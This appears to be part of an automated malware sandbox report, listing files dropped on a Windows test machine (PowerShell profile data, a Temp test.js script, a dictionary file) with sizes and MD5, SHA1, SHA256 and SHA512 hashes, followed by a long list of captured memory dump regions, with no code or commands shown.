9da884483ae247825a9c5cca776cfe8674efae433ad82d17bbcef21349be1e9c51ca0101c5858be0deee5f1ccb72042ddecbfbd2523c34ab617cad15cb10fe93

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
4cb59d549e8c5d613ea4b7524088528a

SHA1
5bdfb9bc4920177a9e5d4b9c93df65383353ab22

SHA256
a4ac74b80eadcb876402dc2842d706a249691176dd838a6100a8c26bfa87811a

SHA512
a9f5bde138142665e056b1e2f40c16cff0c9a6a6907f038c4685275df66ceea39d9fca9a1c72529b2287632e0669346efb06ff302b0199764cca45b23faa4b52

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
caf7c8d742be571cc9df52e5fed42eac

SHA1
6022d6909c68bccce19eeedd6b95b4c74a4eaffb

SHA256
907d59c4a1decc4fcdd1a2614e3884392d7c275f82cc900fe742151b9c9be22c

SHA512
9e8f1a4c2b44b8222f5a31e750ca8fa7f0a4fa6a961c03c0ba8746bc3a8b5cdf08ee91fbc607876b7b2e9ea52562dd55a92d488e4b352f930a4214d5fec8be4b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8b3aafee28df949937a119fa0a969b65

SHA1
2a968c81151a32d4f43a27a078a63b7f3777b253

SHA256
d8f543da2cb7bf8974a39865632e5eba15437b634953b1f99b64570cdc8922c1

SHA512
3f77e8b8101fad2aca79326c651668387ce43afa3107b44f4e3bd216b30b7f627622de8d0c6518deddd7969ce4f752e78c08b8ecbc80bdd4f6441364ba387757

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
9d2339dd684b609bb552a683107b90b5

SHA1
1da6be8762e4500821102aeff75939d6c0766e06

SHA256
a191ecba6842e8e114212476826bcb7995b5da4a50cd1ecf0715a4718c174df5

SHA512
4a3e6573e2553fbf4f6fdad29f58ebfdd68b41d126d091ace9eb7b092a560672949db502a92acf98c51cc97d5b5c4bdb997e956cf3242a7e2aeb0a26d7e5f28e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0f6a3762a04bbb03336fb66a040afb97

SHA1
0a0495c79f3c8f4cb349d82870ad9f98fbbaac74

SHA256
36e2fac0ab8aee32e193491c5d3df9374205e328a74de5648e7677eae7e1b383

SHA512
cc9ebc020ec18013f8ab4d6ca5a626d54db84f8dc2d97e538e33bb9a673344a670a2580346775012c85f204472f7f4dd25a34e59f1b827642a21db3325424b69

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xzv4gg14.5m5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\test.js

Filesize
12KB

MD5
1fb86474569cb04bd88f9421f0928f51

SHA1
7c9f86002055e8468dd14da6dc4c63f03ac8e4a7

SHA256
7f34301509d6975851c1cffedbce7b05b5e3549e2dbdd7f0f4a6dfa5900d83b1

SHA512
3e24ab6ae2bdbd0729a1ee0aeba249dbaa94e0655d893662dd2b63ee030d2e043b79f324c743eaa6c8508140496021aa11e8d94c70e5cda89da725ce12aeda0f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC

Filesize
16B

MD5
d29962abc88624befc0135579ae485ec

SHA1
e40a6458296ec6a2427bcb280572d023a9862b31

SHA256
a91a702aab9b8dd722843d3d208a21bcfa6556dfc64e2ded63975de4511eb866

SHA512
4311e87d8d5559248d4174908817a4ddc917bf7378114435cf12da8ccb7a1542c851812afbaf7dc106771bdb2e2d05f52e7d0c50d110fc7fffe4395592492c2f

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms

Filesize
1KB

MD5
fe2f39e544a71143afbf67348fb83427

SHA1
63a2671605a7176d3d9a70c024eaf8ce0fa8d0dc

SHA256
7afdabbbaa58dfc6707f7bd07f7b94a4da81de0cf4d766851719ec386d1f7819

SHA512
d0da541fa78df74cbbe4be3adc2e06050a3b56856b7b5ef45e95202f0b7fb3495c9615da7a41a80d8a5f75b7b1047406c18e14dec491305214f3169eda620bb7

Download Submit
memory/220-83-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/220-69-0x000001CDEA9C0000-0x000001CDEA9E2000-memory.dmp

Filesize
136KB

Download
memory/220-63-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-20-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-9-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-16-0x00007FF997E20000-0x00007FF997E30000-memory.dmp

Filesize
64KB

Download
memory/2664-14-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-13-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-12-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-34-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-35-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-36-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-37-0x00007FF9DA1ED000-0x00007FF9DA1EE000-memory.dmp

Filesize
4KB

Download
memory/2664-38-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-18-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-47-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-48-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-19-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-0-0x00007FF9DA1ED000-0x00007FF9DA1EE000-memory.dmp

Filesize
4KB

Download
memory/2664-15-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-11-0x00007FF997E20000-0x00007FF997E30000-memory.dmp

Filesize
64KB

Download
memory/2664-7-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-17-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-10-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-8-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-1-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-5-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-6-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-2-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-159-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-162-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-161-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-160-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-163-0x00007FF9DA150000-0x00007FF9DA345000-memory.dmp

Filesize
2.0MB

Download
memory/2664-4-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/2664-3-0x00007FF99A1D0000-0x00007FF99A1E0000-memory.dmp

Filesize
64KB

Download
memory/3100-120-0x000001A22CDA0000-0x000001A22CDAA000-memory.dmp

Filesize
40KB

Download
memory/4000-182-0x0000019C61B50000-0x0000019C61B5A000-memory.dmp

Filesize
40KB

Download
memory/4708-183-0x0000000000400000-0x000000000040A000-memory.dmp

Filesize
40KB

Download
memory/4708-185-0x0000000005F20000-0x00000000064C4000-memory.dmp

Filesize
5.6MB

Download